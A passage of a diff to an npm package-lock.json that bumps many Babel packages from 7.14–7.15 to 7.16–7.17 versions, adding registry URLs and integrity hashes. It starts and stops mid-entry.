"^7.15.4" + "@babel/types": "^7.16.7" } }, "@babel/helper-module-imports": { - "version": "7.15.4", + "version": "7.16.7", + "resolved": "https://registry.npmjs.org/@babel/helper-module-imports/-/helper-module-imports-7.16.7.tgz", + "integrity": "sha512-LVtS6TqjJHFc+nYeITRo6VLXve70xmq7wPhWTqDJusJEgGmkAACWwMiTNrvfoQo6hEhFwAIixNkvB0jPXDL8Wg==", "requires": { - "@babel/types": "^7.15.4" + "@babel/types": "^7.16.7" } }, "@babel/helper-module-transforms": { - "version": "7.15.8", + "version": "7.17.6", + "resolved": "https://registry.npmjs.org/@babel/helper-module-transforms/-/helper-module-transforms-7.17.6.tgz", + "integrity": "sha512-2ULmRdqoOMpdvkbT8jONrZML/XALfzxlb052bldftkicAUy8AxSCkD5trDPQcwHNmolcl7wP6ehNqMlyUw6AaA==", "requires": { - "@babel/helper-module-imports": "^7.15.4", - "@babel/helper-replace-supers": "^7.15.4", - "@babel/helper-simple-access": "^7.15.4", - "@babel/helper-split-export-declaration": "^7.15.4", - "@babel/helper-validator-identifier": "^7.15.7", - "@babel/template": "^7.15.4", - "@babel/traverse": "^7.15.4", - "@babel/types": "^7.15.6" + "@babel/helper-environment-visitor": "^7.16.7", + "@babel/helper-module-imports": "^7.16.7", + "@babel/helper-simple-access": "^7.16.7", + "@babel/helper-split-export-declaration": "^7.16.7", + "@babel/helper-validator-identifier": "^7.16.7", + "@babel/template": "^7.16.7", + "@babel/traverse": "^7.17.3", + "@babel/types": "^7.17.0" }, "dependencies": { "@babel/template": { - "version": "7.15.4", + "version": "7.16.7", + "resolved": "https://registry.npmjs.org/@babel/template/-/template-7.16.7.tgz", + "integrity": "sha512-I8j/x8kHUrbYRTUxXrrMbfCa7jxkE7tZre39x3kjr9hvI82cK1FfqLygotcWN5kdPGWcLdWMHpSBavse5tWw3w==", "requires": { - "@babel/code-frame": "^7.14.5", - "@babel/parser": "^7.15.4", - "@babel/types": "^7.15.4" + "@babel/code-frame": "^7.16.7", + "@babel/parser": "^7.16.7", + "@babel/types": "^7.16.7" } } } }, "@babel/helper-optimise-call-expression": { - "version": "7.15.4", + "version": "7.16.7", + "resolved": "https://registry.npmjs.org/@babel/helper-optimise-call-expression/-/helper-optimise-call-expression-7.16.7.tgz", + "integrity": "sha512-EtgBhg7rd/JcnpZFXpBy0ze1YRfdm7BnBX4uKMBd3ixa3RGAE002JZB66FJyNH7g0F38U05pXmA5P8cBh7z+1w==", + "dev": true, "requires": { - "@babel/types": "^7.15.4" + "@babel/types": "^7.16.7" } }, "@babel/helper-plugin-utils": { - "version": "7.14.5", + "version": "7.16.7", + "resolved": "https://registry.npmjs.org/@babel/helper-plugin-utils/-/helper-plugin-utils-7.16.7.tgz", + "integrity": "sha512-Qg3Nk7ZxpgMrsox6HreY1ZNKdBq7K72tDSliA6dCl5f007jR4ne8iD5UzuNnCJH2xBf2BEEVGr+/OL6Gdp7RxA==", "dev": true }, "@babel/helper-remap-async-to-generator": { - "version": "7.15.4", + "version": "7.16.8", + "resolved": "https://registry.npmjs.org/@babel/helper-remap-async-to-generator/-/helper-remap-async-to-generator-7.16.8.tgz", + "integrity": "sha512-fm0gH7Flb8H51LqJHy3HJ3wnE1+qtYR2A99K06ahwrawLdOFsCEWjZOrYricXJHoPSudNKxrMBUPEIPxiIIvBw==", "dev": true, "requires": { - "@babel/helper-annotate-as-pure": "^7.15.4", - "@babel/helper-wrap-function": "^7.15.4", - "@babel/types": "^7.15.4" + "@babel/helper-annotate-as-pure": "^7.16.7", + "@babel/helper-wrap-function": "^7.16.8", + "@babel/types": "^7.16.8" } }, "@babel/helper-replace-supers": { - "version": "7.15.4", + "version": "7.16.7", + "resolved": "https://registry.npmjs.org/@babel/helper-replace-supers/-/helper-replace-supers-7.16.7.tgz", + "integrity": "sha512-y9vsWilTNaVnVh6xiJfABzsNpgDPKev9HnAgz6Gb1p6UUwf9NepdlsV7VXGCftJM+jqD5f7JIEubcpLjZj5dBw==", + "dev": true, "requires": { - "@babel/helper-member-expression-to-functions": "^7.15.4", - "@babel/helper-optimise-call-expression": "^7.15.4", - "@babel/traverse": "^7.15.4", - "@babel/types": "^7.15.4" + "@babel/helper-environment-visitor": "^7.16.7", + "@babel/helper-member-expression-to-functions": "^7.16.7", + "@babel/helper-optimise-call-expression": "^7.16.7", + "@babel/traverse": "^7.16.7", + "@babel/types": "^7.16.7" } }, "@babel/helper-simple-access": { - "version": "7.15.4", + "version": "7.16.7", + "resolved": "https://registry.npmjs.org/@babel/helper-simple-access/-/helper-simple-access-7.16.7.tgz", + "integrity": "sha512-ZIzHVyoeLMvXMN/vok/a4LWRy8G2v205mNP0XOuf9XRLyX5/u9CnVulUtDgUTama3lT+bf/UqucuZjqiGuTS1g==", "requires": { - "@babel/types": "^7.15.4" + "@babel/types": "^7.16.7" } }, "@babel/helper-skip-transparent-expression-wrappers": { - "version": "7.14.5", + "version": "7.16.0", + "resolved": "https://registry.npmjs.org/@babel/helper-skip-transparent-expression-wrappers/-/helper-skip-transparent-expression-wrappers-7.16.0.tgz", + "integrity": "sha512-+il1gTy0oHwUsBQZyJvukbB4vPMdcYBrFHa0Uc4AizLxbq6BOYC51Rv4tWocX9BLBDLZ4kc6qUFpQ6HRgL+3zw==", "dev": true, "requires": { - "@babel/types": "^7.14.5" + "@babel/types": "^7.16.0" } }, "@babel/helper-split-export-declaration": { - "version": "7.15.4", + "version": "7.16.7", + "resolved": "https://registry.npmjs.org/@babel/helper-split-export-declaration/-/helper-split-export-declaration-7.16.7.tgz", + "integrity": "sha512-xbWoy/PFoxSWazIToT9Sif+jJTlrMcndIsaOKvTA6u7QEo7ilkRZpjew18/W3c7nm8fXdUDXh02VXTbZ0pGDNw==", "requires": { - "@babel/types": "^7.15.4" + "@babel/types": "^7.16.7" } }, "@babel/helper-validator-identifier": { - "version": "7.15.7" + "version": "7.16.7", + "resolved": "https://registry.npmjs.org/@babel/helper-validator-identifier/-/helper-validator-identifier-7.16.7.tgz", + "integrity": "sha512-hsEnFemeiW4D08A5gUAZxLBTXpZ39P+a+DGDsHw1yxqyQ/jzFEnxf5uTEGp+3bzAbNOxU1paTgYS4ECU/IgfDw==" }, "@babel/helper-validator-option": { - "version": "7.14.5" + "version": "7.16.7", + "resolved": "https://registry.npmjs.org/@babel/helper-validator-option/-/helper-validator-option-7.16.7.tgz", + "integrity": "sha512-TRtenOuRUVo9oIQGPC5G9DgK4743cdxvtOw0weQNpZXaS16SCBi5MNjZF8vba3ETURjZpTbVn7Vvcf2eAwFozQ==" }, "@babel/helper-wrap-function": { - "version": "7.15.4", + "version": "7.16.8", + "resolved": "https://registry.npmjs.org/@babel/helper-wrap-function/-/helper-wrap-function-7.16.8.tgz", + "integrity": "sha512-8RpyRVIAW1RcDDGTA+GpPAwV22wXCfKOoM9bet6TLkGIFTkRQSkH1nMQ5Yet4MpoXe1ZwHPVtNasc2w0uZMqnw==", "dev": true, "requires": { - "@babel/helper-function-name": "^7.15.4", - "@babel/template": "^7.15.4", - "@babel/traverse": "^7.15.4", - "@babel/types": "^7.15.4" + "@babel/helper-function-name": "^7.16.7", + "@babel/template": "^7.16.7", + "@babel/traverse": "^7.16.8", + "@babel/types": "^7.16.8" }, "dependencies": { "@babel/template": { - "version": "7.15.4", + "version": "7.16.7", + "resolved": "https://registry.npmjs.org/@babel/template/-/template-7.16.7.tgz", + "integrity": "sha512-I8j/x8kHUrbYRTUxXrrMbfCa7jxkE7tZre39x3kjr9hvI82cK1FfqLygotcWN5kdPGWcLdWMHpSBavse5tWw3w==", "dev": true, "requires": { - "@babel/code-frame": "^7.14.5", - "@babel/parser": "^7.15.4", - "@babel/types": "^7.15.4" + "@babel/code-frame": "^7.16.7", + "@babel/parser": "^7.16.7", + "@babel/types": "^7.16.7" } } } }, "@babel/helpers": { - "version": "7.15.4", + "version": "7.17.2", + "resolved": "https://registry.npmjs.org/@babel/helpers/-/helpers-7.17.2.tgz", + "integrity": "sha512-0Qu7RLR1dILozr/6M0xgj+DFPmi6Bnulgm9M8BVa9ZCWxDqlSnqt3cf8IDPB5m45sVXUZ0kuQAgUrdSFFH79fQ==", "requires": { - "@babel/template": "^7.15.4", - "@babel/traverse": "^7.15.4", - "@babel/types": "^7.15.4" + "@babel/template": "^7.16.7", + "@babel/traverse": "^7.17.0", + "@babel/types": "^7.17.0" }, "dependencies": { "@babel/template": { - "version": "7.15.4", + "version": "7.16.7", + "resolved": "https://registry.npmjs.org/@babel/template/-/template-7.16.7.tgz", + "integrity": "sha512-I8j/x8kHUrbYRTUxXrrMbfCa7jxkE7tZre39x3kjr9hvI82cK1FfqLygotcWN5kdPGWcLdWMHpSBavse5tWw3w==", "requires": { - "@babel/code-frame": "^7.14.5", - "@babel/parser": "^7.15.4", - "@babel/types": "^7.15.4" + "@babel/code-frame": "^7.16.7", + "@babel/parser": "^7.16.7", + "@babel/types": "^7.16.7" } } } }, "@babel/highlight": { - "version": "7.14.5", + "version": "7.16.10", + "resolved": "https://registry.npmjs.org/@babel/highlight/-/highlight-7.16.10.tgz", + "integrity": "sha512-5FnTQLSLswEj6IkgVw5KusNUUFY9ZGqe/TRFnP/BKYHYgfh7tc+C7mwiy95/yNP7Dh9x580Vv8r7u7ZfTBFxdw==", "requires": { - "@babel/helper-validator-identifier": "^7.14.5", + "@babel/helper-validator-identifier": "^7.16.7", "chalk": "^2.0.0", "js-tokens": "^4.0.0" } }, "@babel/parser": { - "version": "7.15.8" + "version": "7.17.3", + "resolved": "https://registry.npmjs.org/@babel/parser/-/parser-7.17.3.tgz", + "integrity": "sha512-7yJPvPV+ESz2IUTPbOL+YkIGyCqOyNIzdguKQuJGnH7bg1WTIifuM21YqokFt/THWh1AkCRn9IgoykTRCBVpzA==" + }, + "@babel/plugin-bugfix-safari-id-destructuring-collision-in-function-expression": { + "version": "7.16.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-bugfix-safari-id-destructuring-collision-in-function-expression/-/plugin-bugfix-safari-id-destructuring-collision-in-function-expression-7.16.7.tgz", + "integrity": "sha512-anv/DObl7waiGEnC24O9zqL0pSuI9hljihqiDuFHC8d7/bjr/4RLGPWuc8rYOff/QPzbEPSkzG8wGG9aDuhHRg==", + "dev": true, + "requires": { + "@babel/helper-plugin-utils": "^7.16.7" + } }, "@babel/plugin-bugfix-v8-spread-parameters-in-optional-chaining": { - "version": "7.14.5", + "version": "7.16.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-bugfix-v8-spread-parameters-in-optional-chaining/-/plugin-bugfix-v8-spread-parameters-in-optional-chaining-7.16.7.tgz", + "integrity": "sha512-di8vUHRdf+4aJ7ltXhaDbPoszdkh59AQtJM5soLsuHpQJdFQZOA4uGj0V2u/CZ8bJ/u8ULDL5yq6FO/bCXnKHw==", "dev": true, "requires": { - "@babel/helper-plugin-utils": "^7.14.5", - "@babel/helper-skip-transparent-expression-wrappers": "^7.14.5", - "@babel/plugin-proposal-optional-chaining": "^7.14.5" + "@babel/helper-plugin-utils": "^7.16.7", + "@babel/helper-skip-transparent-expression-wrappers": "^7.16.0", + "@babel/plugin-proposal-optional-chaining": "^7.16.7" } }, "@babel/plugin-proposal-async-generator-functions": { - "version": "7.15.8", + "version": "7.16.8", + "resolved": "https://registry.npmjs.org/@babel/plugin-proposal-async-generator-functions/-/plugin-proposal-async-generator-functions-7.16.8.tgz", + "integrity": "sha512-71YHIvMuiuqWJQkebWJtdhQTfd4Q4mF76q2IX37uZPkG9+olBxsX+rH1vkhFto4UeJZ9dPY2s+mDvhDm1u2BGQ==", "dev": true, "requires": { - "@babel/helper-plugin-utils": "^7.14.5", - "@babel/helper-remap-async-to-generator": "^7.15.4", + "@babel/helper-plugin-utils": "^7.16.7", + "@babel/helper-remap-async-to-generator": "^7.16.8", "@babel/plugin-syntax-async-generators": "^7.8.4" } }, "@babel/plugin-proposal-class-properties": { - "version": "7.14.5", + "version": "7.16.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-proposal-class-properties/-/plugin-proposal-class-properties-7.16.7.tgz", + "integrity": "sha512-IobU0Xme31ewjYOShSIqd/ZGM/r/cuOz2z0MDbNrhF5FW+ZVgi0f2lyeoj9KFPDOAqsYxmLWZte1WOwlvY9aww==", "dev": true, "requires": { - "@babel/helper-create-class-features-plugin": "^7.14.5", - "@babel/helper-plugin-utils": "^7.14.5" + "@babel/helper-create-class-features-plugin": "^7.16.7", + "@babel/helper-plugin-utils": "^7.16.7" } }, "@babel/plugin-proposal-class-static-block": { - "version": "7.14.5", + "version": "7.17.6", + "resolved": "https://registry.npmjs.org/@babel/plugin-proposal-class-static-block/-/plugin-proposal-class-static-block-7.17.6.tgz", + "integrity": "sha512-X/tididvL2zbs7jZCeeRJ8167U/+Ac135AM6jCAx6gYXDUviZV5Ku9UDvWS2NCuWlFjIRXklYhwo6HhAC7ETnA==", "dev": true, "requires": { - "@babel/helper-create-class-features-plugin": "^7.14.5", - "@babel/helper-plugin-utils": "^7.14.5", + "@babel/helper-create-class-features-plugin": "^7.17.6", + "@babel/helper-plugin-utils": "^7.16.7", "@babel/plugin-syntax-class-static-block": "^7.14.5" } }, "@babel/plugin-proposal-dynamic-import": { - "version": "7.14.5", + "version": "7.16.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-proposal-dynamic-import/-/plugin-proposal-dynamic-import-7.16.7.tgz", + "integrity": "sha512-I8SW9Ho3/8DRSdmDdH3gORdyUuYnk1m4cMxUAdu5oy4n3OfN8flDEH+d60iG7dUfi0KkYwSvoalHzzdRzpWHTg==", "dev": true, "requires": { - "@babel/helper-plugin-utils": "^7.14.5", + "@babel/helper-plugin-utils": "^7.16.7", "@babel/plugin-syntax-dynamic-import": "^7.8.3" } }, "@babel/plugin-proposal-export-namespace-from": { - "version": "7.14.5", + "version": "7.16.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-proposal-export-namespace-from/-/plugin-proposal-export-namespace-from-7.16.7.tgz", + "integrity": "sha512-ZxdtqDXLRGBL64ocZcs7ovt71L3jhC1RGSyR996svrCi3PYqHNkb3SwPJCs8RIzD86s+WPpt2S73+EHCGO+NUA==", "dev": true, "requires": { - "@babel/helper-plugin-utils": "^7.14.5", + "@babel/helper-plugin-utils": "^7.16.7", "@babel/plugin-syntax-export-namespace-from": "^7.8.3" } }, "@babel/plugin-proposal-json-strings": { - "version": "7.14.5", + "version": "7.16.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-proposal-json-strings/-/plugin-proposal-json-strings-7.16.7.tgz", + "integrity": "sha512-lNZ3EEggsGY78JavgbHsK9u5P3pQaW7k4axlgFLYkMd7UBsiNahCITShLjNQschPyjtO6dADrL24757IdhBrsQ==", "dev": true, "requires": { - "@babel/helper-plugin-utils": "^7.14.5", + "@babel/helper-plugin-utils": "^7.16.7", "@babel/plugin-syntax-json-strings": "^7.8.3" } }, "@babel/plugin-proposal-logical-assignment-operators": { - "version": "7.14.5", + "version": "7.16.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-proposal-logical-assignment-operators/-/plugin-proposal-logical-assignment-operators-7.16.7.tgz", + "integrity": "sha512-K3XzyZJGQCr00+EtYtrDjmwX7o7PLK6U9bi1nCwkQioRFVUv6dJoxbQjtWVtP+bCPy82bONBKG8NPyQ4+i6yjg==", "dev": true, "requires": { - "@babel/helper-plugin-utils": "^7.14.5", + "@babel/helper-plugin-utils": "^7.16.7", "@babel/plugin-syntax-logical-assignment-operators": "^7.10.4" } }, "@babel/plugin-proposal-nullish-coalescing-operator": { - "version": "7.14.5", + "version": "7.16.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-proposal-nullish-coalescing-operator/-/plugin-proposal-nullish-coalescing-operator-7.16.7.tgz", + "integrity": "sha512-aUOrYU3EVtjf62jQrCj63pYZ7k6vns2h/DQvHPWGmsJRYzWXZ6/AsfgpiRy6XiuIDADhJzP2Q9MwSMKauBQ+UQ==", "dev": true, "requires": { - "@babel/helper-plugin-utils": "^7.14.5", + "@babel/helper-plugin-utils": "^7.16.7", "@babel/plugin-syntax-nullish-coalescing-operator": "^7.8.3" } }, "@babel/plugin-proposal-numeric-separator": { - "version": "7.14.5", + "version": "7.16.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-proposal-numeric-separator/-/plugin-proposal-numeric-separator-7.16.7.tgz", + "integrity": "sha512-vQgPMknOIgiuVqbokToyXbkY/OmmjAzr/0lhSIbG/KmnzXPGwW/AdhdKpi+O4X/VkWiWjnkKOBiqJrTaC98VKw==", "dev": true, "requires": { - "@babel/helper-plugin-utils": "^7.14.5", + "@babel/helper-plugin-utils": "^7.16.7", "@babel/plugin-syntax-numeric-separator": "^7.10.4" } }, "@babel/plugin-proposal-object-rest-spread": { - "version": "7.14.7", + "version": "7.17.3", + "resolved": "https://registry.npmjs.org/@babel/plugin-proposal-object-rest-spread/-/plugin-proposal-object-rest-spread-7.17.3.tgz", + "integrity": "sha512-yuL5iQA/TbZn+RGAfxQXfi7CNLmKi1f8zInn4IgobuCWcAb7i+zj4TYzQ9l8cEzVyJ89PDGuqxK1xZpUDISesw==", "dev": true, "requires": { - "@babel/compat-data": "^7.14.7", - "@babel/helper-compilation-targets": "^7.14.5", - "@babel/helper-plugin-utils": "^7.14.5", + "@babel/compat-data": "^7.17.0", + "@babel/helper-compilation-targets": "^7.16.7", + "@babel/helper-plugin-utils": "^7.16.7", "@babel/plugin-syntax-object-rest-spread": "^7.8.3", - "@babel/plugin-transform-parameters": "^7.14.5" + "@babel/plugin-transform-parameters": "^7.16.7" } }, "@babel/plugin-proposal-optional-catch-binding": { - "version": "7.14.5", + "version": "7.16.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-proposal-optional-catch-binding/-/plugin-proposal-optional-catch-binding-7.16.7.tgz", + "integrity": "sha512-eMOH/L4OvWSZAE1VkHbr1vckLG1WUcHGJSLqqQwl2GaUqG6QjddvrOaTUMNYiv77H5IKPMZ9U9P7EaHwvAShfA==", "dev": true, "requires": { - "@babel/helper-plugin-utils": "^7.14.5", + "@babel/helper-plugin-utils": "^7.16.7", "@babel/plugin-syntax-optional-catch-binding": "^7.8.3" } }, "@babel/plugin-proposal-optional-chaining": { - "version": "7.14.5", + "version": "7.16.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-proposal-optional-chaining/-/plugin-proposal-optional-chaining-7.16.7.tgz", + "integrity": "sha512-eC3xy+ZrUcBtP7x+sq62Q/HYd674pPTb/77XZMb5wbDPGWIdUbSr4Agr052+zaUPSb+gGRnjxXfKFvx5iMJ+DA==", "dev": true, "requires": { - "@babel/helper-plugin-utils": "^7.14.5", - "@babel/helper-skip-transparent-expression-wrappers": "^7.14.5", + "@babel/helper-plugin-utils": "^7.16.7", + "@babel/helper-skip-transparent-expression-wrappers": "^7.16.0", "@babel/plugin-syntax-optional-chaining": "^7.8.3" } }, "@babel/plugin-proposal-private-methods": { - "version": "7.14.5", + "version": "7.16.11", + "resolved": "https://registry.npmjs.org/@babel/plugin-proposal-private-methods/-/plugin-proposal-private-methods-7.16.11.tgz", + "integrity": "sha512-F/2uAkPlXDr8+BHpZvo19w3hLFKge+k75XUprE6jaqKxjGkSYcK+4c+bup5PdW/7W/Rpjwql7FTVEDW+fRAQsw==", "dev": true, "requires": { - "@babel/helper-create-class-features-plugin": "^7.14.5", - "@babel/helper-plugin-utils": "^7.14.5" + "@babel/helper-create-class-features-plugin": "^7.16.10", + "@babel/helper-plugin-utils": "^7.16.7" } }, "@babel/plugin-proposal-private-property-in-object": { - "version": "7.14.5", + "version": "7.16.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-proposal-private-property-in-object/-/plugin-proposal-private-property-in-object-7.16.7.tgz", + "integrity": "sha512-rMQkjcOFbm+ufe3bTZLyOfsOUOxyvLXZJCTARhJr+8UMSoZmqTe1K1BgkFcrW37rAchWg57yI69ORxiWvUINuQ==", "dev": true, "requires": { - "@babel/helper-annotate-as-pure": "^7.14.5", - "@babel/helper-create-class-features-plugin": "^7.14.5", - "@babel/helper-plugin-utils": "^7.14.5", + "@babel/helper-annotate-as-pure": "^7.16.7", + "@babel/helper-create-class-features-plugin": "^7.16.7", + "@babel/helper-plugin-utils": "^7.16.7", "@babel/plugin-syntax-private-property-in-object": "^7.14.5" } }, "@babel/plugin-proposal-unicode-property-regex": { - "version": "7.14.5", + "version": "7.16.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-proposal-unicode-property-regex/-/plugin-proposal-unicode-property-regex-7.16.7.tgz", + "integrity": "sha512-QRK0YI/40VLhNVGIjRNAAQkEHws0cswSdFFjpFyt943YmJIU1da9uW63Iu6NFV6CxTZW5eTDCrwZUstBWgp/Rg==", "dev": true, "requires": { - "@babel/helper-create-regexp-features-plugin": "^7.14.5", - "@babel/helper-plugin-utils": "^7.14.5" + "@babel/helper-create-regexp-features-plugin": "^7.16.7", + "@babel/helper-plugin-utils": "^7.16.7" } }, "@babel/plugin-syntax-async-generators": { @@ -19230,10 +19826,12 @@ } }, "@babel/plugin-transform-arrow-functions": { - "version": "7.14.5", + "version": "7.16.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-arrow-functions/-/plugin-transform-arrow-functions-7.16.7.tgz", + "integrity": "sha512-9ffkFFMbvzTvv+7dTp/66xvZAWASuPD5Tl9LK3Z9vhOmANo6j94rik+5YMBt4CwHVMWLWpMsriIc2zsa3WW3xQ==", "dev": true, "requires": { - "@babel/helper-plugin-utils": "^7.14.5" + "@babel/helper-plugin-utils": "^7.16.7" } }, "@babel/plugin-transform-async-to-generator": { @@ -19246,184 +19844,232 @@ } }, "@babel/plugin-transform-block-scoped-functions": { - "version": "7.14.5", + "version": "7.16.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-block-scoped-functions/-/plugin-transform-block-scoped-functions-7.16.7.tgz", + "integrity": "sha512-JUuzlzmF40Z9cXyytcbZEZKckgrQzChbQJw/5PuEHYeqzCsvebDx0K0jWnIIVcmmDOAVctCgnYs0pMcrYj2zJg==", "dev": true, "requires": { - "@babel/helper-plugin-utils": "^7.14.5" + "@babel/helper-plugin-utils": "^7.16.7" } }, "@babel/plugin-transform-block-scoping": { - "version": "7.14.5", + "version": "7.16.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-block-scoping/-/plugin-transform-block-scoping-7.16.7.tgz", + "integrity": "sha512-ObZev2nxVAYA4bhyusELdo9hb3H+A56bxH3FZMbEImZFiEDYVHXQSJ1hQKFlDnlt8G9bBrCZ5ZpURZUrV4G5qQ==", "dev": true, "requires": { - "@babel/helper-plugin-utils": "^7.14.5" + "@babel/helper-plugin-utils": "^7.16.7" } }, "@babel/plugin-transform-classes": { - "version": "7.15.4", - "dev": true, - "requires": { - "@babel/helper-annotate-as-pure": "^7.15.4", - "@babel/helper-function-name": "^7.15.4", - "@babel/helper-optimise-call-expression": "^7.15.4", - "@babel/helper-plugin-utils": "^7.14.5", - "@babel/helper-replace-supers": "^7.15.4", - "@babel/helper-split-export-declaration": "^7.15.4", + "version": "7.16.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-classes/-/plugin-transform-classes-7.16.7.tgz", + "integrity": "sha512-WY7og38SFAGYRe64BrjKf8OrE6ulEHtr5jEYaZMwox9KebgqPi67Zqz8K53EKk1fFEJgm96r32rkKZ3qA2nCWQ==", + "dev": true, + "requires": { + "@babel/helper-annotate-as-pure": "^7.16.7", + "@babel/helper-environment-visitor": "^7.16.7", + "@babel/helper-function-name": "^7.16.7", + "@babel/helper-optimise-call-expression": "^7.16.7", + "@babel/helper-plugin-utils": "^7.16.7", + "@babel/helper-replace-supers": "^7.16.7", + "@babel/helper-split-export-declaration": "^7.16.7", "globals": "^11.1.0" } }, "@babel/plugin-transform-computed-properties": { - "version": "7.14.5", + "version": "7.16.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-computed-properties/-/plugin-transform-computed-properties-7.16.7.tgz", + "integrity": "sha512-gN72G9bcmenVILj//sv1zLNaPyYcOzUho2lIJBMh/iakJ9ygCo/hEF9cpGb61SCMEDxbbyBoVQxrt+bWKu5KGw==", "dev": true, "requires": { - "@babel/helper-plugin-utils": "^7.14.5" + "@babel/helper-plugin-utils": "^7.16.7" } }, "@babel/plugin-transform-destructuring": { - "version": "7.14.7", + "version": "7.17.3", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-destructuring/-/plugin-transform-destructuring-7.17.3.tgz", + "integrity": "sha512-dDFzegDYKlPqa72xIlbmSkly5MluLoaC1JswABGktyt6NTXSBcUuse/kWE/wvKFWJHPETpi158qJZFS3JmykJg==", "dev": true, "requires": { - "@babel/helper-plugin-utils": "^7.14.5" + "@babel/helper-plugin-utils": "^7.16.7" } }, "@babel/plugin-transform-dotall-regex": { - "version": "7.14.5", + "version": "7.16.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-dotall-regex/-/plugin-transform-dotall-regex-7.16.7.tgz", + "integrity": "sha512-Lyttaao2SjZF6Pf4vk1dVKv8YypMpomAbygW+mU5cYP3S5cWTfCJjG8xV6CFdzGFlfWK81IjL9viiTvpb6G7gQ==", "dev": true, "requires": { - "@babel/helper-create-regexp-features-plugin": "^7.14.5", - "@babel/helper-plugin-utils": "^7.14.5" + "@babel/helper-create-regexp-features-plugin": "^7.16.7", + "@babel/helper-plugin-utils": "^7.16.7" } }, "@babel/plugin-transform-duplicate-keys": { - "version": "7.14.5", + "version": "7.16.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-duplicate-keys/-/plugin-transform-duplicate-keys-7.16.7.tgz", + "integrity": "sha512-03DvpbRfvWIXyK0/6QiR1KMTWeT6OcQ7tbhjrXyFS02kjuX/mu5Bvnh5SDSWHxyawit2g5aWhKwI86EE7GUnTw==", "dev": true, "requires": { - "@babel/helper-plugin-utils": "^7.14.5" + "@babel/helper-plugin-utils": "^7.16.7" } }, "@babel/plugin-transform-exponentiation-operator": { - "version": "7.14.5", + "version": "7.16.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-exponentiation-operator/-/plugin-transform-exponentiation-operator-7.16.7.tgz", + "integrity": "sha512-8UYLSlyLgRixQvlYH3J2ekXFHDFLQutdy7FfFAMm3CPZ6q9wHCwnUyiXpQCe3gVVnQlHc5nsuiEVziteRNTXEA==", "dev": true, "requires": { - "@babel/helper-builder-binary-assignment-operator-visitor": "^7.14.5", - "@babel/helper-plugin-utils": "^7.14.5" + "@babel/helper-builder-binary-assignment-operator-visitor": "^7.16.7", + "@babel/helper-plugin-utils": "^7.16.7" } }, "@babel/plugin-transform-for-of": { - "version": "7.14.5", + "version": "7.16.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-for-of/-/plugin-transform-for-of-7.16.7.tgz", + "integrity": "sha512-/QZm9W92Ptpw7sjI9Nx1mbcsWz33+l8kuMIQnDwgQBG5s3fAfQvkRjQ7NqXhtNcKOnPkdICmUHyCaWW06HCsqg==", "dev": true, "requires": { - "@babel/helper-plugin-utils": "^7.14.5" + "@babel/helper-plugin-utils": "^7.16.7" } }, "@babel/plugin-transform-function-name": { - "version": "7.14.5", + "version": "7.16.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-function-name/-/plugin-transform-function-name-7.16.7.tgz", + "integrity": "sha512-SU/C68YVwTRxqWj5kgsbKINakGag0KTgq9f2iZEXdStoAbOzLHEBRYzImmA6yFo8YZhJVflvXmIHUO7GWHmxxA==", "dev": true, "requires": { - "@babel/helper-function-name": "^7.14.5", - "@babel/helper-plugin-utils": "^7.14.5" + "@babel/helper-compilation-targets": "^7.16.7", + "@babel/helper-function-name": "^7.16.7", + "@babel/helper-plugin-utils": "^7.16.7" } }, "@babel/plugin-transform-literals": { - "version": "7.14.5", + "version": "7.16.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-literals/-/plugin-transform-literals-7.16.7.tgz", + "integrity": "sha512-6tH8RTpTWI0s2sV6uq3e/C9wPo4PTqqZps4uF0kzQ9/xPLFQtipynvmT1g/dOfEJ+0EQsHhkQ/zyRId8J2b8zQ==", "dev": true, "requires": { - "@babel/helper-plugin-utils": "^7.14.5" + "@babel/helper-plugin-utils": "^7.16.7" } }, "@babel/plugin-transform-member-expression-literals": { - "version": "7.14.5", + "version": "7.16.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-member-expression-literals/-/plugin-transform-member-expression-literals-7.16.7.tgz", + "integrity": "sha512-mBruRMbktKQwbxaJof32LT9KLy2f3gH+27a5XSuXo6h7R3vqltl0PgZ80C8ZMKw98Bf8bqt6BEVi3svOh2PzMw==", "dev": true, "requires": { - "@babel/helper-plugin-utils": "^7.14.5" + "@babel/helper-plugin-utils": "^7.16.7" } }, "@babel/plugin-transform-modules-amd": { - "version": "7.14.5", + "version": "7.16.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-modules-amd/-/plugin-transform-modules-amd-7.16.7.tgz", + "integrity": "sha512-KaaEtgBL7FKYwjJ/teH63oAmE3lP34N3kshz8mm4VMAw7U3PxjVwwUmxEFksbgsNUaO3wId9R2AVQYSEGRa2+g==", "dev": true, "requires": { - "@babel/helper-module-transforms": "^7.14.5", - "@babel/helper-plugin-utils": "^7.14.5", + "@babel/helper-module-transforms": "^7.16.7", + "@babel/helper-plugin-utils": "^7.16.7", "babel-plugin-dynamic-import-node": "^2.3.3" } }, "@babel/plugin-transform-modules-commonjs": { - "version": "7.15.4", + "version": "7.16.8", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-modules-commonjs/-/plugin-transform-modules-commonjs-7.16.8.tgz", + "integrity": 